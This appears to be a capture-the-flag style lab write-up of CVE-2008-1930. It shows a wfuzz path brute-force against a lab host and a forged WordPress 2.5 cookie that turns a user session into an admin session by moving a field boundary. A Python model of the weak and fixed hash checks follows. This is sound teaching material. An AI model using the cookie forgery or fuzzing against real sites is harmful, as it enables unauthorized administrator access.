CVE-2008-1930 WordPress 2.5 Cookie Integrity Protection Vulnerability

Wake up.. Neo.. The Matrix HAS YOU -- The Matrix

From PentesterLab: this course details the exploitation of an issue in the cookie integrity mechanism of WordPress. The issue was found in 2008 and allowed an attacker to gain administrator access to a WordPress instance if user registration is enabled.

Difficulty: 2/5

Forces:

  • Cookie Manager+
  • wfuzz

Waging War

Weaknesses and Strengths

Use wfuzz to brute-force hidden paths on the server:

wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-small.txt --hc 404 http://192.168.79.168/FUZZ 2>/dev/null

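Next, we log in as user admin1 with the password pentesterlab.

Here we can use Cookie Manager+ to view the cookies we received.

Modify the cookie from admin1%7C1461188835%7Ce6cf864114aa5acaae0795ff56b333b0 to admin%7C11461188835%7Ce6cf864114aa5acaae0795ff56b333b0 and reload the page; we are now in admin's session. The cookie has the form username%7Cexpiration%7Chash (%7C is a URL-encoded "|"). WordPress 2.5 computes the hash over the username and the expiration concatenated without a delimiter, so admin1 followed by 1461188835 and admin followed by 11461188835 are the same signed string and the original hash still validates.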
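
The cookie check described above, as an added example that is not WordPress's own code or part of the original course: a simplified Python model of the hash construction, with the concatenated (weak) form next to the delimited (corrected) form. The secret, the clock value and all function names are assumptions made for the illustration; the user names and expiration values are the ones from the cookie above.

```python
import hashlib
import hmac

SECRET = b"constructed-demo-secret"  # assumption: stands in for the site's secret key


def _mac(data: str) -> str:
    """Two-step keyed MD5 over the string to be protected (simplified model)."""
    key = hmac.new(SECRET, data.encode(), hashlib.md5).hexdigest()
    return hmac.new(key.encode(), data.encode(), hashlib.md5).hexdigest()


def _signed_string(user: str, expiration: str, delimited: bool) -> str:
    # Weak form: fields are glued together, so the boundary between them is not signed.
    # Corrected form: the delimiter is part of the signed data.
    return f"{user}|{expiration}" if delimited else f"{user}{expiration}"


def make_cookie(user: str, expiration: int, delimited: bool) -> str:
    """Return user|expiration|mac ('|' appears as %7C once URL-encoded)."""
    return f"{user}|{expiration}|{_mac(_signed_string(user, str(expiration), delimited))}"


def validate_cookie(cookie: str, now: int, delimited: bool):
    """Return the authenticated user name, or None if the cookie is rejected."""
    parts = cookie.split("|")
    if len(parts) != 3:
        return None
    user, expiration, mac = parts
    if not expiration.isdigit() or int(expiration) < now:
        return None
    expected = _mac(_signed_string(user, expiration, delimited))
    return user if hmac.compare_digest(mac, expected) else None


def boundary_shift_accepted(delimited: bool) -> bool:
    """Regression check: reuse admin1's MAC with the field boundary moved."""
    now = 1461100000  # constructed clock value, earlier than both expirations
    issued = make_cookie("admin1", 1461188835, delimited)
    mac = issued.rsplit("|", 1)[1]
    shifted = f"admin|11461188835|{mac}"  # same characters, different split
    return validate_cookie(shifted, now, delimited) == "admin"


if __name__ == "__main__":
    print("concatenated fields:", boundary_shift_accepted(False))
    print("delimited fields:   ", boundary_shift_accepted(True))
```

The same check works as a regression test for any token format that signs several fields: every field boundary has to be part of the signed data.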